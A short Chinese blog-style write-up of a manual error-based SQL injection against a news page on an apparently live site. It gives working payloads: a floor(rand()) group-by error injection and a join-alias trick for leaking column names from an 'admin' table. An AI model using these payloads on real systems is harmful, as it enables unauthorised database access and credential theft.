一次简单的手工注入

注入点http://xxx/news.php?newsid=18
收集了下IP，不能sqlmap了，就只能手工了。

1）确定注入点。

经典 and 1=1 1=2

2）简单的order by 确定字段数。

一直报错，感觉是被过滤了，后面使用注释符也不行
使用union select 1，2，3也报错，确定不了字段数。

3）尝试报错注入

成功
payload：

union select 1,2,count(*) from information_schema.tables where table_schema=database() group by concat(0x7e,database(),0x7e,floor(rand(0)*2)) --

更改database()即可

4）心灰意冷

以为只是简单报错注入，猜库，猜表就完事了。
得出库名与表名。再出列名的时候报错了

select column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

一直出不了列名

5）柳暗花明又一村

找到大牛的语句

select name from test where id=1 and (select * from (select * from test as a join test as b) as c);

这个的原理就是在使用别名的时候，表中不能出现相同的字段名，于是我们就利用join把表扩充成两份，在最后别名c的时候 查询到重复字段，就成功报错爆出列名。（本地测试，替换到database()就可以了）

会出现一个存在的列名，然后在使用using，这个不能出现重复的列名


这样就得到了最终的列名，后续不再演示了

总结

简单的一次手注，写出来就是想记录

select * from (select * from test as a join test as b) as c

的使用，第一次遇到这种情况，记录一下。

如有不对，希望及时指正